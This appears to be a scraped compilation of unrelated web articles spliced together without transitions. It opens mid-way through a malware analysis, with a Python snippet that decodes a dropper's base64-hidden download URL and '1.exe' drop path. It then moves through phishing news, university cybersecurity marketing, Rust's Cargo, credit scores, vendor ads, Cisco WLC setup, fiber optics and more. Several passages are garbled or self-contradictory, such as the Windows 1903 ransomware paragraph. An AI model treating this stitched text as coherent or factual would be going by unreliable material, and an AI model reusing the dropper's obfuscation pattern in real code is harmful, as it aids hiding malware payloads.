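# the local drop path; the script appends '1' + '.e' + 'x' + 'e' to the
# decoded path at runtime.
url = base64.b64decode(url_b64).decode("ascii")
drop_path = base64.b64decode(path_b64).decode("ascii") + "1.exe"
print(url)
print(drop_path)
```

Treat the decoded URL strictly as an indicator of compromise for blocklists and log searches, not as something to visit.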
Phishing attacks against Office 365
Users of Microsoft 365 (formerly Office 365) have been attacked recently with a phishing email that supposedly delivers a missed voicemail message as an attachment. In fact, the attached HTML page led victims to a phishing website that mimics the Microsoft 365 login page.
Attacks target Wuhan government offices
Recently, FireEye wrote about the Vietnamese APT32 attack that targeted government offices in Wuhan and the Chinese Ministry of Emergency Management. One of the decoy RTF documents in a spear-phishing attack showed a New York Times article titled Coronavirus Live Updates: China is Tracking Travelers From Hubei and used it to load a malicious payload identified by FireEye researchers as METALJACK.
Currently, the document is not detected by any antivirus engine on VirusTotal.
It’s worth noting that COVID-19 poses a threat not only to human health but also to sensitive personal and business information that can be easily stolen with the help of social engineering tricks. Being suspicious of emails and web links from those you don’t know can go a long way in keeping your data and funds protected from scammers.
NIST researchers are studying how “intelligent” building systems can be used by firefighters, police and other first responders to accurately assess emergency conditions in real-time.
One of the biggest problems faced by first responders is a lack of accurate information. Where is the fire within the building? How big is it? Are there flammable chemicals stored nearby?
NIST is working with industry to develop standards to allow manufacturers to create intelligent building systems that use various types of communication networks (including wireless networks) to assist first responders in assessing and mitigating emergencies.
The systems would send information such as building floor plans and data from motion, heat, biochemical and other sensors and video cameras directly to fire and police dispatchers who then can communicate detailed information about the scene to first responders.
Read the full story at the NIST site
Cyberattacks on Colleges and Universities
Cyberattacks on colleges and universities are commonly levied by criminals aiming to steal their research or student information. Cyber criminals will often use phishing, spear phishing, and hardware or software vulnerabilities to launch assaults on their networks and information.
Cyberattacks on universities are also common because attackers can use a university’s powerful computers to execute the attack if they are able to gain access to some of its resources.
Reasons Why Colleges and Universities Are Cyberattack Favorites
Cybersecurity in higher ed is particularly important because cyber criminals are often drawn by enticing financial opportunities. Some of these include:
- Ransomware attacks that enable them to demand a ransom
- Cyber extortion where they can blackmail users into paying money
- Stealing student information and selling it on the dark web
Financial gain is a primary driver for cyberattacks in the education sector.
Wealth of Personally Identifiable Information (PII)
Because student records are filled with sensitive PII, cyber criminals often target university databases. If they are able to penetrate the network, they can steal then use or sell the information to another criminal seeking to defraud people.
Valuable, Confidential Research
Universities spend millions each year in the discovery and investigation of cutting-edge concepts. Therefore, cyber criminals target them knowing a successful incursion could yield a treasure trove of information.
In an attempt to keep students, alumni, faculty, and staff connected, many colleges and universities try to maintain relatively open access. This can make them attractive targets for cyber criminals seeking to exploit weak defenses.
Remote operations and access privileges expand the attack surface significantly. Those who need to gain access to the network may do so using insecure public networks or home networks with lax protections.
Older systems may function well and support key elements of a university’s infrastructure, but they are also prone to security vulnerabilities. The longer a system has been around, the more time cyber criminals have had to find ways to crack it. This leaves many institutions vulnerable.
Large Untrained Network User Base
From students to faculty to support staff, the user base of a college or university’s network is huge. Many of them are unaware of the vast number of cybersecurity threats and attack vectors, leaving the institution exposed to breaches. Also, uninformed users are more likely to fall for attacks such as phishing, spear phishing, or spoofing—all of which hinge on a lack of understanding regarding legitimate vs. fake messages and sites.
Types of Cyberattacks That Colleges and Universities Are Most Likely To Face
A ransomware attack is one in which the attacker takes control of the user’s computer, locking them out until the hacker receives a payment. The value of the information and digital systems make universities a high-priority target for ransomware attacks.
Hacking is when someone gains unauthorized access to a computer or system, and hackers like to take advantage of the sometimes weak security protocols of higher education institutions. It is important for a university to guard against hackers to remain in compliance with the Family Educational Rights and Privacy Act (FERPA), which protects the privacy of students’ records.
A recent case study reveals how strategically positioning FortiGate next-generation firewalls (NGFWs) can protect an institution's network at the edge, in the data center, and in the cloud. Hillsborough Community College adopted a bring-your-own-device (BYOD) policy that greatly increased the size of its attack surface. They chose to use FortiGate NGFWs to protect multiple segments of their network, as well as keep students and staff in separate wireless domains. In this way, they were able to maintain a lean IT staff while preventing harmful hacking.
Taking steps like Hillsborough Community College has against hackers is necessary. This is especially true in light of an attack on the University of Michigan. Hackers were able to gain access to the university's social media platforms, resulting in an expensive, time-consuming breach.
Phishing involves sending communications, typically through email, that trick a victim into giving away sensitive information. The attack surface of a college or university includes all students, faculty, and staff that have email accounts, necessitating a need for vigilance around phishing.
In a spear-phishing attack, the attacker seeks to target specific victims to steal information or install malware on their systems. Higher education cybersecurity therefore needs to involve educating users who may be particularly vulnerable to spear phishing. These would include professors, department heads, and anyone with access to student records.
Spoofing involves a person or a program appearing to be legitimate when it is really trying to steal data or infiltrate a system. A university or college is susceptible to spoofing attacks by virtue of its large and often uninformed user community.
Impact of Cyberattacks on Colleges and Universities
The risk posed by cyberattacks falls into three categories.
Institutions can experience significant financial loss due to ransomware attacks, students choosing to enroll in other schools that have better cybersecurity, and fewer donations from alumni.
A college or university that has a successful attack publicized in the media may look vulnerable and weak. This hurts its standing with alumni, board members, the general public, and most significantly, current and potential students.
A cybersecurity breach can impact remote learning for students, the financial transactions performed by bursars, vendors, and students, the grade management system, and other key elements of the institution’s infrastructure.
How Can Colleges and Universities Defend Against Cyberattacks?
Regular Monitoring and Early Detection
By regularly checking the health of a system, as well as incorporating an early detection solution, you can spot attacks early in their life cycle. This can prevent extensive damage or thwart the attack altogether.
Establish a Formal Security Policy
A formal security policy helps get all stakeholders on board and attaches specific action steps to security objectives. Also, a formal security policy helps encourage more enthusiastic buy-in from stakeholders.
Education and Training
When students and faculty are trained to recognize, avoid, and mitigate the effects of attacks, the entire institution is safer, as is its reputation and income stream.
Recent Cyberattacks on Colleges and Universities
In 2020 alone, there were over a dozen high-profile cyberattacks on colleges and universities. These include breaches at:
- Richmond Community Schools in Michigan
- Gadsden Independent School District in Las Cruces, New Mexico
- Michigan State University (twice)
- Columbia College in Chicago
- University of California, San Francisco (twice)
- The entire California State University system
- Lenoir-Rhyne University, a private school in Hickory, North Carolina
- University of Notre Dame
- University of South Dakota
- University of Central Arkansas
- Wake Technical Community College in Raleigh, North Carolina
How Fortinet Can Help Avoid Cyberattacks on Colleges and Universities
Fortinet has years of experience protecting colleges and universities from cyberattacks. With FortiOS 7.0, a college or university gets a security-focused operating system that bolsters both your cyber protections and the functioning of your network. Students and faculty can safely access your institution’s services from all over the globe, thanks to FortiSASE. This provides cloud-based Security-as-a-Service (SECaaS) to protect the diverse and broad networks of universities and colleges.
Developing IoT Applications with Rust: Using a Rust Development Environment
Developers are most productive when they have tools to support all aspects of the software development cycle.
This includes programming languages, library and package managers, and testing and deployment tools. The Rust programming language has matured to the point that its ecosystem now includes an array of key support tools. One of these tools is Cargo.
Cargo is a package manager that supports all the core tasks of package management in both binary and library form. Cargo handles a lot of tasks, such as building your code, downloading the libraries your code depends on, and building those libraries, or dependencies.
Once Rust is installed, you can use Cargo from the command line. Cargo commands are intuitive to the point of being obvious. For example, the ‘cargo new’ command instructs Cargo to create a new package, which includes a directory structure for the package and a specification for the package, called a manifest. The manifest contains metadata used by the Rust compiler.
Application code often has dependencies on other libraries and artifacts. When a Rust application has dependencies, Cargo can fetch those dependencies during the build process. To build a package, we use the ‘cargo build’ command, which in turn invokes the Rust compiler, ‘rustc’.
Cargo observes conventions regarding package directory structure. Subdirectories include src (for source code), benches (for benchmark code) and tests (for integration tests). The default executable file is src/main.rs. However, additional binaries can live in src/bin/.
Cargo’s configuration metadata is defined in Cargo.toml, which is created and maintained manually. Another metadata file, Cargo.lock, contains metadata about dependencies. Unlike Cargo.toml, Cargo.lock is maintained by Cargo and won’t be edited by developers. Configuration data is specified in TOML format, which is designed to have obvious semantics.
Cargo.toml contains sections describing the package, dependencies and features. The package section includes name, version, authors, path to build script, and license information. The dependencies section holds package dependencies, test dependencies, and build dependencies. Lastly, the features section specifies conditional compilation conditions, which is useful when working with multiple environments that need different configurations.
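Putting those sections together, a minimal Cargo.toml might look like the sketch below. The package name, crate versions and feature names are illustrative, not taken from the article:

```toml
[package]
name = "iot-sensor-node"      # illustrative package name
version = "0.1.0"
authors = ["Jane Doe <jane@example.com>"]
edition = "2018"
license = "MIT"
# build = "build.rs"          # optional path to a build script

[dependencies]
rand = "0.8"                  # random number generation
log = "0.4"                   # logging facade

[dev-dependencies]
# crates compiled only for `cargo test`, e.g. assertion helpers

[features]
default = []
simulated-hardware = []       # conditional compilation for a test rig
```

Running `cargo build` against a manifest like this resolves the listed dependencies and records the exact versions in Cargo.lock.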
Developers can specify integration tests and run those tests using the ‘cargo test’ command. It’s common practice to use both unit tests and integration tests. Unit tests are designed to test one component or application function at a time, while integration tests will test the application in ways similar to how the application will be used in production. By convention, Rust expects to find tests in the tests subdirectory of a package. Each file in the tests subdirectory is compiled as a separate crate.
Often, developers will re-use common functions across tests and this is easily done with Rust. Developers can create public functions in modules and then import them into tests.
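As a self-contained sketch of that pattern, the module below defines a public helper that an inline unit test exercises; in a real package the module would live under src/ and an integration test importing it would sit in the tests/ directory. The sensor-conversion function itself is a made-up example:

```rust
pub mod sensor {
    /// Convert a raw 10-bit ADC reading (0..=1023) into degrees Celsius.
    /// The linear mapping from -40 °C to +60 °C is an illustrative assumption.
    pub fn adc_to_celsius(raw: u16) -> f64 {
        (f64::from(raw.min(1023)) / 1023.0) * 100.0 - 40.0
    }

    // Unit tests live next to the code they test and can call
    // private items via `use super::*;` if needed.
    #[cfg(test)]
    mod tests {
        use super::adc_to_celsius;

        #[test]
        fn full_scale_maps_to_sixty_degrees() {
            assert!((adc_to_celsius(1023) - 60.0).abs() < 1e-9);
        }
    }
}

// An integration test in tests/conversion.rs would instead import the
// crate like any external caller, e.g. `use iot_sensor_node::sensor;`
// (crate name assumed), and Cargo would compile that file as its own crate.
```

`cargo test` runs both the inline unit tests and every crate under tests/.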
When looking at the organization of a Rust application, there are multiple levels of structure. The lowest level is the function, common across programming languages. Modules are different related functions grouped into a single file. Crates, the next level up, contain modules and, as noted earlier, are the unit of compilation. The last organizational unit is workspaces. These are used to organize multiple crates in the same application.
Rust extends the advantages of this modular application structure beyond just what one developer creates. The Crates.io site contains tens of thousands of crates that are available for use. There are widely used crates for common functional requirements, like generating random numbers, logging, and parsing command line arguments. In addition, there are many specialized crates, including ones for IoT application development. There will be more specifics on those IoT crates in the next article of this series.
In the United States, basically every part of our financial life revolves around something called a credit score. We all know what a credit score is, but not many of us know how it works. Prospective borrowers tell lenders a lot about themselves with just three digits: their credit score. Lenders will know if you normally pay your bills and loans on time or if you are in the habit of paying late. They will also know what types of recorded debt you have, including car loans and mortgages, and even what percentage of your credit card borrowing capacity is available to you each month.
The FICO credit scoring system hasn’t always been around, though. In 1841, the Mercantile Agency collected information from its members around the country to standardize assessments of a borrower’s character and assets. In the end, the statistics being collected proved too subjective, as many of the assessments carried racial, class, and gender biases.
Just over 100 years later, in 1956, the Fair, Isaac and Company – now known as FICO – was founded. They didn’t get their big break until 1989 when their algorithm became the industry standard for determining credit riskiness.
When you apply for loans or new credit cards, lenders will rely on your credit history report to determine how risky a borrower you are. You may not qualify for a car loan or mortgage if your credit score is too low, and if you do qualify with a low credit score, your interest rate will be much higher than for those with excellent credit scores. This increased interest rate means a higher cost of borrowing, because the lender considers you a higher-risk borrower.
What are some factors that impact your credit score?
- Payment history – do you have a history of paying on-time consistently?
- Percentage of credit usage – the more you use, the more your credit score will suffer.
- Age of credit history – how long have you been a trustworthy buyer?
- Mix of credit – how many forms of credit have you taken out? If you have more types, it’s positive towards your credit score.
- Hard inquiries – when a lender pulls your credit report, your score can dip temporarily.
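As a toy illustration of how such factors could combine (this is not FICO's proprietary formula; the sub-scores are invented, and only the category weights of 35/30/15/10/10 reflect FICO's published category breakdown):

```python
# Category weights per FICO's published breakdown.
WEIGHTS = {
    "payment_history":    0.35,
    "credit_utilization": 0.30,
    "credit_age":         0.15,
    "credit_mix":         0.10,
    "new_inquiries":      0.10,
}

def toy_score(subscores):
    """Blend 0-100 category sub-scores into the 300-850 score range."""
    blended = sum(WEIGHTS[k] * subscores[k] for k in WEIGHTS)  # 0..100
    return round(300 + blended / 100 * 550)

# A hypothetical borrower who pays on time but carries high utilization.
borrower = {
    "payment_history":    95,
    "credit_utilization": 60,
    "credit_age":         70,
    "credit_mix":         80,
    "new_inquiries":      90,
}
print(toy_score(borrower))
```

The point of the sketch is only that payment history and utilization dominate the blend, so improving those two categories moves the number the most.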
LibertyID provides expert, full service, fully managed identity theft restoration to individuals, couples, extended families* and businesses. LibertyID has a 100% success rate in resolving all forms of identity fraud on behalf of our subscribers.
*Extended families – primary individual, their spouse/partner, both sets of parents (including those that have been deceased for up to a year), and all children under the age of 25
The importance of the lithium-ion battery for future data centres
Data Centers are becoming more essential as demand for data skyrockets in the COVID-19 era, whether it be enterprises and governments relying more heavily on cloud services, or consumers using more bandwidth as they rely on the internet during lockdowns.
But data centers have, for years, faced criticism for vast perceived inefficiencies: many expend a gargantuan amount of energy, in many cases unsustainably; data centers also traditionally have large physical footprints due to the size of its many machines.
But there may be a solution these two problems – the lithium-ion (Li-ion) battery.
The uninterruptible power supply (UPS) is the cornerstone of the modern data center, and is one of the primary culprits of inefficient usage of hardware. Traditional lead-based batteries are becoming increasingly redundant – and data centers have begun to look for a solution that offers a compact, efficient, reliable power supply with a long lifespan.
Huawei's SmartLi UPS solution answers the call by leveraging the company's cutting-edge Li-ion battery technology and delivering a ‘reinvention' of the power supply system for the next generation of data centers.
It does this with Huawei's UPS power module, which boasts a high density of 100 kW/3U – pushing system efficiency up to 97%, compared with 96% efficiency in the industry.
Using only one 1.2MW UPS system, a data center's electricity fee can be reduced by US$70,000 over the product's 10-year lifecycle, according to Huawei. It also offers a ‘1 MW, 1 rack' configuration, which effectively reduces the power supply's physical footprint by 50%.
Its high-power-density Li-ion batteries also achieve a 70% smaller physical footprint than their Valve-Regulated Lead Acid (VRLA) counterparts.
By leveraging ultimate UPS efficiency, data centers can lower costs and save thousands, free up valuable floor real estate within their facility, and opt for a greener solution for future data centers.
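The claimed saving is easy to sanity-check: raising efficiency from 96% to 97% on a 1.2 MW load cuts input power by roughly 13 kW. A back-of-envelope calculation (the electricity price is my assumption, not a figure from the article):

```python
load_kw = 1200.0                      # 1.2 MW of IT load
input_at_96 = load_kw / 0.96          # power drawn at 96% efficiency
input_at_97 = load_kw / 0.97          # power drawn at 97% efficiency
delta_kw = input_at_96 - input_at_97  # ~12.9 kW less wasted power

hours = 10 * 365 * 24                 # the product's 10-year lifecycle
price_per_kwh = 0.06                  # assumed electricity price, US$/kWh

savings = delta_kw * hours * price_per_kwh
print(f"~US${savings:,.0f} over ten years")
```

With that assumed price the result lands in the high US$60,000s, consistent with the article's US$70,000 figure.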
Functionally, the SmartLi UPS system's modular design ensures no single point of failure – with an LFP cell impervious to fires or explosions, as well as cabinet-level extinguishing to prevent any combustion from spreading.
SmartLi UPS also leverages an active current balance control interface, allowing the system to function normally even if a battery module fails. This balance control technology also allows for the concurrent use of old and new batteries.
Reliability is further enshrined within the product with its 10-year, 5,000 cycle lifetime.Real-life application
When Intelligent Power Solutions CEO Peter Perjesi first met with Huawei to discern whether the company would implement its UPS solutions, he was doubtful.
“To tell the truth, I was sceptical about its features,” says Perjesi.
“But when I saw the product, I saw the basic parts of the UPS were high-quality elements like long-life capacitors, IGBT, fans and so on.
“We got the test products and all of the tests passed. I was surprised – our engineers really tried to kill the unit, but they couldn't," Perjesi says.
“Maximisation of space utilisation; less operation and maintenance cost; longer service life; more efficient energy utilisation – the answer for all of these requirements is the Huawei SmartLi solution.
To find out more about Huawei's SmartLi UPS system, click here.
How to Create Public Confidence in Election Systems
The key to democracy is public confidence in election systems. Winners and losers of an election, as well as the voters, must be able to trust the outcome of the electoral process. Computer forensics is a powerful tool to identify election hacking, but there are obstacles. We'll look at the forensic analysis of the WinVote voting machine and alternatives to computer forensics to establish public confidence in election systems.
Election security is a complex topic with numerous areas to consider and analyze. Some areas of interest include:
- The Current State and Belief of Election Cybersecurity Integrity
- Political Views on Cybersecurity
- Likely Targets: Who, What, and Disinformation
What is Merchandising?
Merchandising involves the tactics (or business processes) that contribute to the sale of goods and services to the customer for profit. Merchandising is the promotion of the sale of goods that can employ pricing, special offers, display and other techniques designed to influence consumers’ buying decisions. The concept of merchandising is based on presenting products at the right time, at the right place, in the right quantity and at the right price to maximize sales.
At a retail in-store level, merchandising refers to the variety of products available for sale and the display of those products in such a way that it stimulates interest and entices customers to make a purchase.
For example, the definition of product merchandising applies whether a retailer is merchandising shoes in-person or online, and even if they are merchandising a product that isn't physical, such as an eBook.
In this article we will go through a basic step-by-step configuration of a Cisco Wireless LAN Controller. Before going forward, let’s first cover some basics about the product and Cisco’s WLAN technology:
Cisco introduced two types of Wireless architectures in its WiFi portfolio:
- Distributed Architecture.
- Centralized Architecture.
- Distributed WiFi Architecture: In Distributed Architecture all the WiFi Access Points (APs) are self-contained and called autonomous or standalone APs. Autonomous APs work individually and have to be configured and managed one by one. In this Architecture an autonomous Access Point performs both 802.11 operations and management operations.
- Centralized WiFi Architecture: In Centralized Architecture the access points are controlled and managed by a central device called Wireless LAN Controller (WLC) and such APs are called Lightweight APs. A lightweight access point performs only the real-time 802.11 operation. All the management functions are usually performed on a wireless LAN controller. A Lightweight AP cannot operate on its own.
Before jumping into the configuration, let’s talk a little bit about Wireless LAN Controller Ports, Controller Interfaces and CAPWAP protocol.
1) Redundant port (RJ-45)
2) Service port (RJ-45)
3) Console port (RJ-45)
4) USB ports 0 and 1 (Type A)
5) Console port (Mini USB Type B)
6) SFP distribution system ports 1–8
7) Management port LEDs
8) SFP distribution port Link and Activity LEDs
9) Power supply (PS1 and PS2), System (SYS), and Alarm (ALM) LEDs
10) Expansion module slot
WLC Controller Ports:
Controller ports are the physical ports of the device, as shown in the picture above. The following are the most important physical ports:
- Service Port (SP): Used for initial boot functions, system recovery and out-of-band management. If you want to configure the controller with the GUI, you need to connect your computer to the service port.
- Redundancy Port (RP): This port is used to connect another controller for redundant operations.
- Distribution Ports: These ports are used for all Access Points and management traffic. A Distribution Port connects to a switch port in trunk mode. 4400 series controllers have four distribution ports and 5500 series controllers have eight distribution ports.
- Console port: Used for out-of-band management, system recovery and initial boot functions.
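Because each distribution port expects a trunk, the attached switch port is configured accordingly. A hedged Cisco IOS sketch (the interface name and VLAN list are placeholders for your environment):

```
interface TenGigabitEthernet1/0/1
 description Uplink to WLC distribution port 1
 switchport mode trunk
 switchport trunk allowed vlan 10,20,30
```

Pruning the allowed-VLAN list to only the management VLAN and the client VLANs keeps unnecessary broadcast traffic off the controller link.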
WLC Controller Interfaces:
WLC Controller Interfaces are logical entities on the device. The following are the most important Controller logical Interfaces:
- Management Interface: Used for all management traffic.
- Virtual Interface: Used to relay client DHCP requests, client web authentication and to support mobility.
- Service port interface: Bound to the service port and used for out-of-band management. The default IP address is 192.168.1.1. If you want to configure the controller for the first time with the GUI, connect your computer to this port; the computer should be in the same subnet as the service interface.
- Dynamic Interface: Used to connect to VLAN to a WLAN.
CAPWAP (Control and Provisioning of Wireless Access Points) is the protocol that binds a Lightweight Access Point to a WLC. The CAPWAP protocol encapsulates the traffic between the Lightweight Access Point and the WLC in a virtual tunnel called the CAPWAP tunnel (control traffic on UDP port 5246, data traffic on UDP port 5247). All the traffic from the access point to the WLC travels through this tunnel. Keep in mind that in a Centralized WiFi Architecture, all traffic from the Access Points terminates at the WLC and is then forwarded from the controller to the wired network, as shown in the figure below:
Basic Cisco WLC Configuration
Below is the initial configuration of a 5508 Wireless LAN Controller. My comments on each step of the configuration appear in quotation marks. To access the CLI you need to connect your computer to the console port of the Wireless LAN Controller with a console cable.
Wireless LAN Controller initial configuration with the CLI:
Welcome to the Cisco Wizard Configuration Tool
Use the ‘-‘ character to backup
Would you like to terminate autoinstall? [yes]: no
“enter no to follow the auto-install instructions”
AUTO-INSTALL: starting now. . .
System Name [Cisco_38:b4:2f]: My_WLC
Enter Administrative User Name (24 characters max): Admin
Enter Administrative Password (3 to 24 characters): *******
Re-enter Administrative Password : *******
“Enter your Wireless LAN Controller name, then the username and password that you will use to log into the WLC”
Service Interface IP address Configuration [static] [DHCP]: DHCP
“Assign a static ip or select DHCP”
Management Interface IP Address: 192.168.10.10
Management Interface Netmask: 255.255.255.0
Management Interface Default Router: 192.168.10.1
Management Interface VLAN Identifier (0 = untagged): 10
Management Interface DHCP Server IP Address: 192.168.1.3
“By default, the interface is configured for VLAN 0, with no ip address and controller uses a single management interface for both management and CAPWAP traffic.”
Virtual Gateway IP Address: 184.108.40.206
“Used to relay client DHCP requests, client web authentication and to support mobility. This value Must match among mobility groups.”
Mobility/RF Group Name: XYZ
“Mobility / RF Group allows multiple wireless controllers to be clustered into one logical Controller group to allow dynamic RF adjustments and roaming for wireless clients.”
Network Name (SSID): TEST
Allow Static IP Addresses [YES][no]: no
“By default on WLC one WLAN SSID is already configured.”
Configure a RADIUS Server now? [YES][no]: no
Warning! The default WLAN security policy requires a RADIUS server.
Please see documentation for more details.
“Configure RADIUS server settings if you have a RADIUS server. By default RADIUS server is enabled.”
Enter Country Code (enter ‘help’ for a list of countries) [US]: US
Enable 802.11b Network [YES][no]: yes
Enable 802.11a Network [YES][no]: yes
Enable 802.11g Network [YES][no]: yes
Enable Auto-RF [YES][no]: yes
“By default, a controller enables 802.11a, 802.11b and 802.11g for all access points that associate with it”
Configure a NTP server now? [YES] [NO]:no
Warning! No AP will come up unless the time is set.
Please see documentation for more details.
“You have to set the time or an NTP server. If you don’t have an NTP server, enter no, then log into the GUI and set the time on the controller from there”
Configuration correct? If yes, system will save it and reset. [yes][NO]:yes
Resetting system with new configuration…
“After the initial setup, the WLC saves the changes and reboots”
In an optical network, transmission distance is just as important to us as speed. What limits transmission distance? Fiber optic cable may come to mind first: compared with copper cable, it supports longer distances, higher speeds and higher bandwidth. However, nothing is perfect, and fiber optic cable still has imperfections that limit transmission distance. Other parts of the transmission path, such as transceivers, splices and connectors, limit it as well. The following sections give the details.
Fiber optic cable can be divided into single-mode and multimode cable, and single-mode cable supports a longer transmission distance than multimode cable. The reason is dispersion, which spreads an optical signal over time and limits how far it can travel. Dispersion takes two forms: chromatic dispersion, the spreading of the signal over time that results from different wavelengths of light travelling at different speeds, and modal dispersion, the spreading that results from different propagation modes.
For single-mode fiber cable, chromatic dispersion is what limits the transmission distance. Because the core of single-mode fiber is much smaller than that of multimode fiber, only a single mode propagates, so modal dispersion is eliminated and the transmission distance is longer. For multimode fiber cable, modal dispersion is the main cause: the modes travel paths of different lengths, so the optical signals cannot arrive simultaneously, and the delay between the fastest and slowest modes spreads the pulse and limits the performance of multimode fiber cable.
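To make the chromatic dispersion effect concrete, the pulse broadening over a span can be estimated as the dispersion parameter times the fiber length times the source's spectral width. The sketch below uses illustrative values that are assumptions, not figures from this article: standard single-mode fiber near 1550 nm is commonly quoted around 17 ps/(nm·km), and a narrow-linewidth laser can be well under 1 nm wide.

```python
def chromatic_broadening_ps(d_ps_nm_km, length_km, spectral_width_nm):
    # Pulse spreading from chromatic dispersion:
    # delta_t = D * L * delta_lambda
    return d_ps_nm_km * length_km * spectral_width_nm

# Illustrative, assumed values (not from the article):
# D = 17 ps/(nm*km), an 80 km span, and a 0.1 nm source linewidth.
spread = chromatic_broadening_ps(17.0, 80.0, 0.1)
print(spread)  # 136.0 ps of spreading over the span
```

Because the broadening grows linearly with length, a wider-spectrum source (such as an LED) or a longer span quickly eats into the time slot available per bit, which is exactly why dispersion bounds distance.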
Like most terminal equipment, fiber optic transceiver modules are electronic. Transceivers perform the EOE conversion (electrical-optical-electrical), which depends largely on an LED (light emitting diode) or a laser diode inside the transceiver, serving as its light source. This light source also affects the transmission distance of a fiber optic link.
LED-based transceivers can only support short distances and low data rates, so they cannot satisfy the increasing demand for higher data rates and longer transmission distances. For those, most modern transceivers use a laser diode. The most commonly used laser sources are the Fabry-Perot (FP) laser, the Distributed Feedback (DFB) laser and the Vertical-Cavity Surface-Emitting Laser (VCSEL). The following table shows the main characteristics of these light sources.
| Light Source | Transmission Distance | Transmission Speed | Spectral Width | Cost |
|---|---|---|---|---|
| LED | Short Range | Low Speed | Wide Spectral Width | Low Cost |
| FP | Medium Range | High Speed | Medium Spectral Width | Moderate Cost |
| DFB | Long Range | Very High Speed | Narrow Spectral Width | High Cost |
| VCSEL | Medium Range | High Speed | Narrow Spectral Width | Low Cost |
As the table above shows, different light sources operate at different wavelengths, and the maximum distance a fiber optic transmission system can support depends on the wavelength at which the signal is transmitted. Generally, the longer wavelengths suffer less attenuation and support longer distances, so choosing the right wavelength for transmitting optical signals is necessary. Multimode fiber systems generally use wavelengths of 850 nm and 1300 nm, while 1300 nm and 1550 nm are standard for single-mode systems.
Bandwidth is another important factor that influences the transmission distance. Usually, as the bandwidth increases, the transmission distance decreases proportionally. For instance, a fiber that can support 500 MHz bandwidth at a distance of one kilometer will only be able to support 250 MHz at 2 kilometers and 100 MHz at 5 kilometers. Due to the way in which light passes through them, single-mode fiber has an inherently higher bandwidth than multimode fiber.
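The inverse relationship described above is the fiber's bandwidth-distance product: a fixed MHz·km figure that is divided by the link length. The sketch below reproduces the article's own 500 MHz·km example.

```python
def supported_bandwidth_mhz(bw_dist_product_mhz_km, distance_km):
    # For a fixed MHz*km product, usable bandwidth falls
    # in proportion to the link length.
    return bw_dist_product_mhz_km / distance_km

product = 500.0  # MHz*km, the example fiber from the text
print(supported_bandwidth_mhz(product, 1))  # 500.0 MHz at 1 km
print(supported_bandwidth_mhz(product, 2))  # 250.0 MHz at 2 km
print(supported_bandwidth_mhz(product, 5))  # 100.0 MHz at 5 km
```

The same calculation explains why single-mode fiber, with its inherently higher bandwidth-distance product, is preferred for long links.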
Splices and connectors also reduce transmission distance. Signal loss occurs each time the optical signal passes through a splice or connector, and the amount of loss depends on the type, quality and number of connectors and splices.
All in all, many factors limit the transmission distance: the fiber optic cable type, the transceiver module's light source, the transmission wavelength, the bandwidth, and splices and connectors. For each of these factors, different methods and choices can be taken to increase the transmission distance. Equipment such as repeaters and optical amplifiers is also useful for supporting long-distance transmission, so there is usually some way to extend your reach.
Sound unlikely? I don’t think it’s as crazy as it seems, especially when we think of everything that has changed in the last ten years, like social media, artificial intelligence, and automation.
The work human beings do will continue to shift as some jobs become obsolete and new jobs emerge – and the experience and skill set we'll need in the future look very different from the ones we need today.
Soft skills will grow in importance as the demand for the things machines can’t do continues to increase. However, the ability to understand and work confidently with technology will still be critical.
With that in mind, here are four digital skills you need to cultivate to thrive in the new world of work:
Digital literacy refers to the skills needed to learn, work, and navigate our everyday lives in an increasingly digital world. When we have digital literacy skills, we are able to interact easily and confidently with technology. This means skills like:
- Keeping on top of emerging new technologies
- Understanding what tech is available and how it can be used
- Using digital devices, software, and applications – at work, in educational settings, and in our everyday lives
- Communicating, collaborating, and sharing information with other people using digital tools
- Staying safe and secure in a digital environment
We're currently right in the middle of the fourth industrial revolution, a movement that is defined by many waves of new technology that combine digital and physical worlds. For instance, you've probably noticed the flood of "smart" everyday devices on the market today, from watches to thermostats that are connected to the internet.
All of that new technology is underpinned by data – and that’s why data literacy is one of the critical skills we’re going to need in the future.
Data literacy means a basic ability to understand the importance of data and how to turn it into insights and value. In a business context, you’ll need to be able to access appropriate data, work with data, find meaning in the numbers, communicate insights to others, and question the data when necessary.
“Technical skills” is a broad category these days – it’s not just IT and engineering skills that will be needed in the workplace of the future. As the nature of work changes and workflows become more automated, a wide variety of technical skills are still enormously valuable.
In essence, technical skills are the practical or physical skills needed to do a job successfully. Demand for these skills goes far beyond coding, AI, data science, and IT – although admittedly, those skills are indeed in very high demand. If you’re a plumber, you have technical skills. Same for project managers, carpenters, nurses, and truck drivers.
We will need more specific technical skills in every industry as new technologies come on the scene, so you should be prepared to continually learn and focus on professional development through a combination of training, education, and on-the-job training.
Digital Threat Awareness
Cybercriminals are getting smarter and more nefarious as the world becomes more digital. This means new threats that could have enormous impacts on our personal and professional lives.
Digital threat awareness means being aware of the dangers of being online or using digital devices and having the tools you need to keep yourself and your organization safe.
With so many of our everyday activities happening online (from making doctor’s appointments to ordering Friday night takeaway), our digital footprints are larger than ever.
Digital threat awareness means understanding the biggest threats in our everyday lives, including:
- Digital addiction
- Online privacy and protecting your data
- Password protection
- Digital impersonation
- Data breaches
- Malware, ransomware, and IoT attacks
In general, lowering the risks of these digital threats means we all need to develop a healthier relationship with technology and teach others how to get the most out of tech and have it enrich our lives without being dominated by it.
Over the last couple of decades, many entrepreneurs and small business owners as well as global business giants have seen the value of selling their goods and services online through e-commerce as opposed to opening a physical brick and mortar store.
While e-commerce, whether it is social media selling ventures, websites, or online marketplaces, is incredibly profitable when done right (especially in relation to overhead costs in traditional setups) it is still a ripe feeding ground for malicious hackers and breaches of cybersecurity.
In this age of digitalization, it is becoming increasingly crucial for businesses to have a reliable and secure online presence. However, this comes with a downside of higher risks to cyberattacks. Now and then, businesses fall victim to cyber-attacks that could have been prevented with the proper cybersecurity measures. This is where engaging managed cybersecurity services can be beneficial to your business.
Companies doing business with the Department of Defense (DoD) often become targets of different cyberattacks. Defense contractors become targets because the DoD sources them to carry out various tasks, including storing and sharing sensitive information. Therefore, without proper security safeguards, it can threaten the lives of service members and National Security.
That’s why cybersecurity and privacy regulations have been changed or updated over the past decade. Hackers are finding new and sophisticated ways to launch cyberattacks on information systems of contractors and subcontracts. As a result, the DoD has implemented laws and regulations to protect its data.
Several cybersecurity standards may come from federal, state, local, or tribal agencies. Therefore, this article will serve as a brief guide to some DoD cybersecurity regulations.
Microsoft has just released version 1903 for the Windows operating system. The update includes several new features: the ransomware protection feature for Windows Defender, which is the built-in virus protection software for Windows 10.
However, users no longer need to worry about data protection with the latest protection features. To enable this feature, PC users must have Windows 10 version 1903 and a fast internet connection.
